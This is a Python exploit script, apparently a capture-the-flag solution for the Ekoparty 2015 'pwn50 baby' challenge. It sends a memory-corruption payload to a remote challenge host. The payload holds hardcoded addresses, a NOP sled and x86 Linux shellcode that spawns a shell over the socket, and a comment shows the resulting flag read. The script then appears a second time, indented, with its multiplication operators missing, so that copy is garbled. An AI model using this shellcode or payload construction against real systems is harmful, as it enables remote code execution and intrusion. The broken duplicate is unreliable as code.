soez/ctf_ekoparty_2015-pwn50_baby.py

## ctf_ekoparty_2015-pwn50_baby.py
from amnesia import *
from struct import pack, unpack
import time

p = lambda x: pack("<L", x)
u = lambda x: unpack('<L', x)[0]

shellcode  = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8"
shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73"
shellcode += "\x68\x68\x2f\x2f\x62\x69\x89\xe3"
shellcode += "\x52\x89\xe2\x53\x89\xe1\xb0\x0b"
shellcode += "\xcd\x80"

# 0x8048510 malloc@plt
# 0x8048614 call edx;;

s = amnesiaSocket("ctfchallenges.ctf.site", 50004)
print s.readUntil("Size: ")
s.writeLine("442")
s.writeLine("10c" + "\x97" + "A"*6 + "\x00" + "A"*16 + "\x00"*5 + "A"*12 + p(0x8049b54) + p(0x8048510) + p(0x8048614) + p(0x10) + "\x90\x90" + shellcode + "\xeb\x80"*400)
s.interact_shell()

'''
id
uid=1000(baby) gid=1000(baby) groups=1000(baby)
cat flag.txt
EKO{welc0me_baby_pwning_CH4LL}
'''
	from amnesia import *
	from struct import pack, unpack
	import time

	p = lambda x: pack("<L", x)
	u = lambda x: unpack('<L', x)[0]

	shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8"
	shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73"
	shellcode += "\x68\x68\x2f\x2f\x62\x69\x89\xe3"
	shellcode += "\x52\x89\xe2\x53\x89\xe1\xb0\x0b"
	shellcode += "\xcd\x80"

	# 0x8048510 malloc@plt
	# 0x8048614 call edx;;

	s = amnesiaSocket("ctfchallenges.ctf.site", 50004)
	print s.readUntil("Size: ")
	s.writeLine("442")
	s.writeLine("10c" + "\x97" + "A"6 + "\x00" + "A"16 + "\x00"5 + "A"12 + p(0x8049b54) + p(0x8048510) + p(0x8048614) + p(0x10) + "\x90\x90" + shellcode + "\xeb\x80"*400)
	s.interact_shell()

	'''
	id
	uid=1000(baby) gid=1000(baby) groups=1000(baby)
	cat flag.txt
	EKO{welc0me_baby_pwning_CH4LL}
	'''